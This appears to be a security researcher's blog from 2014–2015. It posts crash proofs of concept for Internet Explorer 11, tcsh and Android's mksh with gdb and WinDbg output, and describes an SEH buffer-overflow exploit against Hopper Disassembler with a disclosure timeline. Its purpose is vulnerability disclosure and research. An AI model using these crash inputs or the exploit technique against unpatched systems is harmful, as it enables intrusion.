Monday, 22 June 2015

Browsing stackoverflow for interesting crashes - Microsoft Internet Explorer 11

Here is a nice example why it is worth to browse stackoverflow.com for crash reports. Recently i stumbled upon this post:
http://stackoverflow.com/questions/28114732/internet-explorer-11-crashes-when-angulars-http-post-is-used-with-large-complex

I checked it out and as for today (22 Jun 2015) it crashes the latest Internet Explorer 11. The crash log looks interesting:
The proof of concept from the post is huge so i decided to downsize it a bit and here it is:
Certainly more readable. As usual maybe someone will find it useful.

From one of the comments in the stackoverflow discussion, we can see that Microsoft is already looking into it (23 Jan 2015).

Sunday, 7 June 2015

Microsoft Internet Explorer 11 Crash PoC

A test case that looked interesting at first, but most likely it is only a null ptr. Anyway you can find the proof of concept below.

It was tested on Windows 7 and 8.1, doesnt crash on older versions of IE as the faulty code was introduced in IE11.

Friday, 3 April 2015

Crashing Shells

A quick post about two crashes i found in tcsh (default FreeBSD shell, however the BSD version does not segfault) and mksh (default shell on Android). As i'm not planning to research it further, i will just leave it here. Maybe someone will figure out if any of this can be exploited somehow.

tcsh:
1. Affected version
 tcsh 6.18.01 and maybe older. FreeBSD version handled it just fine.

3. PoC
$ perl -e 'print "\$?:\x80"' | tcsh

Program received signal SIGSEGV, Segmentation fault.
0x080d827a in xputchar (c=8388738) at sh.print.c:156
156 if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {
(gdb) x/i $eip
=> 0x80d827a : movzwl (%eax,%ebx,2),%edx
Where the last byte marked with red color can be anything > 0x79 to trigger the crash.

Android shell / mksh:

1. Affected version
mksh-R50e and maybe older. Tested on latest source version and a Nexus with Android 5.0.1

2. PoC

D:\Android\sdk\platform-tools>adb shell # run shell
shell@mako:/ $ cd sdcard # must be a dir that is not read-only
cd sdcard
shell@mako:/sdcard $ 4444444444444>4 # actual input that causes the crash
4444444444444>4

D:\Android\sdk\platform-tools> # our shell died 


It seems to crash at exec.c:1415 in function iosetup() if (e->savefd[iop->unit] == 0) {

update:
by manipulating the first part of the expression we can control EAX and EBP value:
e.g.
$ 10947955850>1

Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0x8c8c8c8a       -1936946038
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x991da068       0x991da068
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
$ 1000200887800>1
Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0xe09e5df8       -526492168
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x41414344       0x41414344
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) bt
#0  0x80009c92 in ?? ()
Backtrace stopped: Cannot access memory at address 0x41414348
The bug has been patched in the latest R-50f release.
Bug report can be seen here and the fix here.

Tuesday, 10 February 2015

Microsoft Internet Explorer CShadow Direction Integer Overflow Remote Code Execution CVE-2015-0036 (MS15-009)

In this months bulletin Microsoft has fixed multiple vulnerabilities in Internet Explorer including one which was mine. It was an integer overflow in the CShadow filter which could lead to remote code execution. It affected Internet Explorer 10 and 11. You can find the original ZDI advisory here and the Microsoft Bulletin here.

There is some confusion when it comes to CVE assignment, as Microsoft acknowledged me for CVE-2015-0035 (also credited to Sky) while ZDI marked my bug CVE-2015-0036 which is credited to an anonymous researcher on the bulletin page. I will update this post if something changes regarding to that.

Monday, 24 November 2014

Hopper Disassembler 2.8.7 / 3.6.2 Mach-O Handling Buffer Overflow

Inspired by @j00ru talk @ SECURE 2014 i decided to do a quick check of Hopper Disassembler (which is a great tool btw, I highly recommend it).

As a sample i simply used one of the system tools from OS X (/bin/ls) and started fuzzing. I quickly began recording tons of crashes.The most interesting one was this:


And file diff showed something like that:
Its pretty straightforward right ? I checked the modules, and a standard SEH exploit should work for us:
I calculated the offsets:
By now i thought it's over, but first problems started to show when i wanted to substitute my A's and B's with pointers and other non printable characters (e.g. NOPs or INT 3) - Hopper would not crash at all.
Instead of NOPs i could use \x40\x48 which is inc eax, dec eax.


Regarding SEH overwrite i couldn't use short jump so i had to find a pointer that would later assemble to a instruction that wouldn't crash. Fortunately libpng had a nice ascii printable pointer which i could use for pop pop ret.


Next there was a problem with ascii only shellcode. I needed one of the register to point to it, but in case of SEH registers are XOR'ed. I found a solution here. Basically by using multiple POPAD instructions we can get ESP point to our buffer and then return to it.

Now we can just generate our shellcode and place it in the controlled area:

When we let it run we get:
Short demo:

The final result can be downloaded here: Hopper run calc

Vulnerable versions:
Hopper 2.8.7 and probably older versions (tested on Windows)
Hopper 3.6.2 and probably older versions (tested on Mac OS X)
Linux version was not tested.

Timeline:
17 Nov 2014 - issue reported to the vendor
18 Nov 2014 - vendor releases a fix for Mac OS X (3.6.3 version)
 24 Nov 2014 - publication of this article
Windows version remains unpatched as its development is currently on hold.






Tuesday, 22 July 2014

SyScan360 2014 - Mobile Browsers Security: iOS

Last week together with Lukasz Pilorz I was speaking about mobile browsers security on iOS @ SyScan360 in Beijing. Visiting China for the first time was a great experience, and the conference itself was just awesome. Cool people, very technical talks and good organization is what it makes this event exceptional.

Our slides are already available for download from the conference site here.

Sunday, 22 June 2014

Microsoft Internet Explorer 11 (11.0.9600.17107) MSHTML!CStr::_Free Crash

Another crash in IE11, maybe someone will find it interesting. It occurs when calling the Developer Tools (F12). After i finished minimizing the test case it turned out to be just one line:


 To reproduce the crash it is required to:
1. enable pageheap
2. open the html file
3. press F12/open Developer Tools
 Also you need the exact build version as in the title (or lower) because this issue was fixed in the last Microsoft Security Bulletin (https://technet.microsoft.com/en-us/library/security/ms14-jun.aspx). I have not really investigated that crash, because i found it the day before patch tuesday, and when it got fixed i moved on.

(b5c.5fc): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\ntdll.dll -
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\SYSTEM32\MSHTML.dll -
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML+0x4f36a:
6bc0f36a 8b06            mov     eax,dword ptr [esi]  ds:0023:07d30fdc=00000001
0:005> .symfix
0:005> .reload
Reloading current modules
................................................................
...............
0:005> r
eax=00000000 ebx=00000000 ecx=07d30fdc edx=6bda90b0 esi=07d30fdc edi=0a294fe8
eip=6bc0f36a esp=048b93a0 ebp=048b93bc iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
MSHTML!CStr::_Free+0x5:
6bc0f36a 8b06            mov     eax,dword ptr [esi]  ds:0023:07d30fdc=00000001
0:005> k
ChildEBP RetAddr 
048b93a0 6c222df4 MSHTML!CStr::_Free+0x5
048b93bc 6c50fb52 MSHTML!CListenerDispatch::ConstructCode+0x78
048b9494 6c365616 MSHTML!CDoc::DynamicAttachDebugger+0x350
048ba078 6bd42176 MSHTML!CDoc::ExecHelper+0x623721
048ba098 6eeb93dd MSHTML!CDoc::Exec+0x21
048ba0e8 6eeb9097 DiagnosticsTap!DebugThreadController::IOleCommandTargetExec+0xb9
048ba11c 6eeb8ef0 DiagnosticsTap!DebugThreadController::EnableSourceRundown+0x4e
048ba134 6eec4294 DiagnosticsTap!DebugThreadController::Initialize+0x81
048ba154 6b5479f1 DiagnosticsTap!TapObject::CreateDebuggerController+0x9f
048ba1d0 6b5474a2 F12Tools!BHOSite::LaunchOutOfProcHost+0x205
048ba454 6b546bdc F12Tools!BHOSite::InitializeWindowsAndThreads+0x3bc
048ba480 75e07051 F12Tools!BHOSite::SetSite+0xb0
048ba498 66d226e8 shcore!IUnknown_SetSite+0x2c
048ba4cc 66f424ab IEFRAME!CBandSite::_AddBandByID+0xe5
048ba508 66f2a446 IEFRAME!CBandSite::AddBandWithCLSID+0x3b
048ba550 66f296e5 IEFRAME!CShellBrowser2::_GetInfoBandBS+0x177
048ba5a4 66f2e01d IEFRAME!CShellBrowser2::_EnsureAndNavigateBand+0x8e
048ba5c8 66ddf834 IEFRAME!CShellBrowser2::_ShowHideBrowserBar+0x60
048ba5ec 66e6712d IEFRAME!CShellBrowser2::_SetBrowserBarState+0x1b9
048ba878 66f2f2f0 IEFRAME!CShellBrowser2::Exec+0x23a758
048bbb38 66e654e8 IEFRAME!CShellBrowser2::v_OnCommand+0xc72
048bc390 66c3b164 IEFRAME!CBaseBrowser2::v_WndProc+0x228497
048bc484 66c281f5 IEFRAME!CShellBrowser2::v_WndProc+0x1ae
048bc4a8 779d75b3 IEFRAME!CShellBrowser2::s_WndProc+0x58
048bc4d4 779d77b8 user32!_InternalCallWinProc+0x23
048bc554 779d9744 user32!UserCallWinProcCheckWow+0x110
048bc5b0 779d9894 user32!DispatchClientMessage+0xb5
048bc5d8 77b92cde user32!__fnDWORD+0x2c
048bc608 779ed2a1 ntdll!KiUserCallbackDispatcher+0x2e
048bc60c 66d093e6 user32!NtUserTranslateAccelerator+0xa
048bc62c 66d09383 IEFRAME!CShellBrowser2::TranslateAcceleratorSB+0x34
048bc654 66d09214 IEFRAME!CShellBrowser2::_MayTranslateAccelerator_CCommonBrowser+0xb7
048bc680 66cf6d9f IEFRAME!CShellBrowser2::_MayTranslateAccelerator+0x3b
048bf840 66c8358f IEFRAME!CTabWindow::_TabWindowThreadProc+0x587
048bf8f8 71ec1b7c IEFRAME!LCIETab_ThreadProc+0x31c
048bf908 6eb531cc iertutil!_IsoThreadProc_WrapperToReleaseScope+0xe
048bf934 762b17ad IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x71
048bf940 77b73af4 KERNEL32!BaseThreadInitThunk+0xe
048bf984 77b73acd ntdll!__RtlUserThreadStart+0x20
048bf994 00000000 ntdll!_RtlUserThreadStart+0x1b